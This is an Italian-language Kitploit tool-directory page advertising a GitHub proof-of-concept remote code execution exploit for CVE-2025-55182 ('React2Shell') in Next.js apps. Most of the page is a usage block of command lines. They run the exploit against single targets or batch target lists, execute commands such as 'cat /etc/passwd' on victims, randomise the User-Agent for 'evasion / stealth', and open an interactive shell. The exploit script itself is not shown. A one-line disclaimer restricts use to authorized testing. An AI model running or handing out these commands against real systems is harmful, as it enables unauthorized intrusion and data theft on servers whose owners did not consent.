Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-React2Shell-RCE-Shell — CVE-2025-55182 – React2Shell: Proof-of-Concept Remote Code Execution (RCE) exploit per app Next.js. Offre un prompt shell interattivo per testare e dimostrare la vulnerabilità in tempo reale. Utilizzare solo per ricerca sulla sicurezza e penetration-testing autorizzati. | Kitploit
Strumenti/GitHubGitHub/m4xsec/cve-2025-55182-react2shell-rce-shell
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubm4xsec/cve-2025-55182-react2shell-rce-shell

CVE-2025-55182-React2Shell-RCE-Shell

CVE-2025-55182 – React2Shell: Proof-of-Concept Remote Code Execution (RCE) exploit per app Next.js. Offre un prompt shell interattivo per testare e dimostrare la vulnerabilità in tempo reale. Utilizzare solo per ricerca sulla sicurezza e penetration-testing autorizzati.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
818 mesi faNon ancora revisionato

‼️ CVE-2025-55182 Pwn React2Shell RCE Exploit con Prompt Shell Interattivo e Sfruttamento di Massa

Questo repository fornisce un proof-of-concept funzionante per CVE-2025-55182, una RCE che colpisce alcune implementazioni di Next.js. Lo strumento apre un prompt shell interattivo al momento dello sfruttamento, consentendo ai ricercatori di sicurezza di testare e verificare la sfruttabilità. Utilizzare solo su target autorizzati e in modo responsabile.

poc

🕸️ USO:

root@kitploit:~
# Getting Started
git clone https://github.com/M4xSec/CVE-2025-55182-React2Shell-RCE-Shell/
cd /CVE-2025-55182-React2Shell-RCE-Shell/
python3 CVE-2025-55182-exploit.py 

# Single target (default mode)
python3 CVE-2025-55182-exploit.py -u http://target.com

# Target on localhost + specify callback / proxy URL (if applicable)
python3 CVE-2025-55182-exploit.py -u http://localhost:3000 -p http://127.0.0.1:8080

# Use HTTPS target and skip certificate verification (if applicable)
python3 CVE-2025-55182-exploit.py -u https://target.com -k

# Batch mode: supply list of targets (one per line)
python3 CVE-2025-55182-exploit.py -l targets.txt

# Custom command execution on target
python3 CVE-2025-55182-exploit.py -u http://target.com --custom "id"

python3 CVE-2025-55182-exploit.py -u http://target.com --custom "cat /etc/passwd"

python3 CVE-2025-55182-exploit.py -u http://target.com --custom "uname -a" -v

# Provide additional headers if needed (e.g. custom cookies)
python3 CVE-2025-55182-exploit.py -u http://target.com -H "Cookie: session=abc123" --custom "ps aux"

# Batch + custom commands (multiple commands separated with semicolon)
python3 CVE-2025-55182-exploit.py -l targets.txt --custom "whoami; id; pwd"

# Only output the payload without executing (payload-only mode)
python3 CVE-2025-55182-exploit.py -u http://target.com --custom "cat /etc/passwd" --payload-only

# Use a random User-Agent header for evasion / stealth
python3 CVE-2025-55182-exploit.py -u http://target.com --random-agent

python3 CVE-2025-55182-exploit.py -l targets.txt --random-agent -k

# Interactive shell mode (if exploit succeeds)
python3 CVE-2025-55182-exploit.py -u http://target.com --shell
Scarica lo strumento